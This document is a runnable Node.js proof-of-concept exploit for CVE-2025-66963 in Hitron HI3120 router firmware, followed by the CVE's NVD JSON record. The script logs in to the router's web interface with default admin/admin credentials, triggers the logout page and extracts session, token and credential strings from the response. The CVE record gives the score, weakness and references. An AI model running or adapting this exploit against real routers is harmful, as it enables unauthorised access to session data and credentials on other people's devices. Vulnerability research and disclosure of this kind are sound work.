CVE-2025-66963

// CVE-2025-66963 PoC - Hitron HI3120 Information Disclosure // Affected Version: Hitron HI3120 v.7.2.4.5.2b1 // Attack Vector: Local access to router web interface const http = require('http'); // Configuration const routerIP = '192.168.1.1'; // Default Hitron router IP const targetPath = '/index.html'; // Step 1: Authenticate to router function authenticate() { return new Promise((resolve, reject) => { const options = { hostname: routerIP, port: 80, path: '/login', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' } }; const req = http.request(options, (res) => { let data = ''; res.on('data', (chunk) => { data += chunk; }); res.on('end', () => { console.log('[+] Authentication response received'); resolve(res.headers['set-cookie']); }); }); req.write('username=admin&password=admin'); req.end(); }); } // Step 2: Trigger logout and capture sensitive data function triggerLogoutAndExfiltrate(cookies) { return new Promise((resolve, reject) => { const options = { hostname: routerIP, port: 80, path: targetPath + '?logout=1', method: 'GET', headers: { 'Cookie': cookies.join('; ') } }; const req = http.request(options, (res) => { let data = ''; res.on('data', (chunk) => { data += chunk; }); res.on('end', () => { console.log('[+] Logout triggered, analyzing response...'); // Check for sensitive information in response if (data.includes('session') || data.includes('token') || data.includes('auth') || data.includes('credential')) { console.log('[!] Sensitive information found in logout response!'); console.log('[*] Extracted data length:', data.length); // Extract and log sensitive patterns const sensitivePatterns = data.match(/(session|token|auth|credential)[^\s"<>]*/gi); if (sensitivePatterns) { console.log('[*] Found sensitive data:', sensitivePatterns); } } resolve(data); }); }); req.end(); }); } // Main execution async function exploit() { console.log('[*] CVE-2025-66963 PoC - Hitron HI3120 Information Disclosure'); console.log('[*] Target:', routerIP); try { const cookies = await authenticate(); await triggerLogoutAndExfiltrate(cookies); console.log('[+] Exploitation complete'); } catch (error) { console.error('[-] Error:', error.message); } } exploit();

{"cve": {"id": "CVE-2025-66963", "sourceIdentifier": "[email protected]", "published": "2025-12-15T16:15:53.607", "lastModified": "2025-12-23T18:05:08.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Hitron HI3120 v.7.2.4.5.2b1 allows a local attacker to obtain sensitive information via the Logout option in the index.html"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hitrontech:hi3120_firmware:7.2.4.5.2b1:*:*:*:*:*:*:*", "matchCriteriaId": "6C315869-A243-4FE1-9991-AD4C110B7123"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hitrontech:hi3120:-:*:*:*:*:*:*:*", "matchCriteriaId": "6D97FEBC-1D94-43A8-B749-E27DEAD38497"}]}]}], "references": [{"url": "http://hitron.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/kakarotossj3/CVEs/blob/main/Hitron/Insufficient%20Session%20Expiration/Details", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}